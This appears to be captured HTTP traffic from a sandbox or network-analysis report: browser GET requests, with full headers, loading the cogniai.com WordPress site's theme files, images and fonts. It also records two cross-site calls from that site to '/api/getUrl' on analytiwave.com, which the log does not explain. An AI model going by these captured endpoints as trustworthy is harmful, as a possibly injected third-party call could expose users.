Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/css/bootstrap.min.css?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/css/style.css?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/css/odometer.min.css?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/custom.css?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/css/flaticon.css?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/11/thumb_COGNIAI-Concept9-FF-01-1.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/09/sptech1-1-1.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/11/COGNIAI-Concept9-FF-01.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.8 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/09/techze-about-76.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.8 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/09/sptech1-1-1.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/js/team.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/js/jquery.min.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/11/thumb_COGNIAI-Concept9-FF-01-1.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/js/fancybox.min.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/js/odometer.min.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/js/wow.min.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/js/swiper.min.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /s/outfit/v11/QGYyz_MVcBeNP4NjuGObqx1XmO1I4TC1O4a0Ew.woff2 HTTP/1.1host: fonts.gstatic.comorigin: https://cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CIS2yQEIpbbJAQipncoBCIb0ygEIlaHLAQiKo8sBCIWgzQE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://fonts.googleapis.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/js/scripts.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/js/3d.jquery.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/js/magnific.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/js/pointer.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/js/mag.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/09/slider-techze-12-1.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/09/slider-techze-13-1.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/js/yukari-cik.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/11/COGNIAI-Concept9-FF-01.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/09/techze-about-76.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/custom.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /releases/v5.15.4/css/free-v4-font-face.min.css?token=e8bbb49528 HTTP/1.1host: ka-f.fontawesome.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://cogniai.comsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /releases/v5.15.4/css/free-v4-shims.min.css?token=e8bbb49528 HTTP/1.1host: ka-f.fontawesome.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://cogniai.comsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /releases/v5.15.4/css/free.min.css?token=e8bbb49528 HTTP/1.1host: ka-f.fontawesome.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://cogniai.comsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/09/slider-techze-12-1.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/09/slider-techze-13-1.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/09/ss2-1.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2024/09/cyberpunk-illustration-with-neon-colors-futuristic-technology-1-scaled.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /api/getUrl HTTP/1.1host: analytiwave.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://cogniai.comsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/09/ss3-1.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/09/ss4-1-1.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/09/projects-ai-1.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2023/09/projects-ai-2.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2022/12/small-project-3.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /api/getUrl HTTP/1.1host: analytiwave.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://cogniai.comsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9if-none-match: W/"34-2HFKtX0T3kgSM93i0ueL4WdTadg"priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2022/12/small-project-4.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
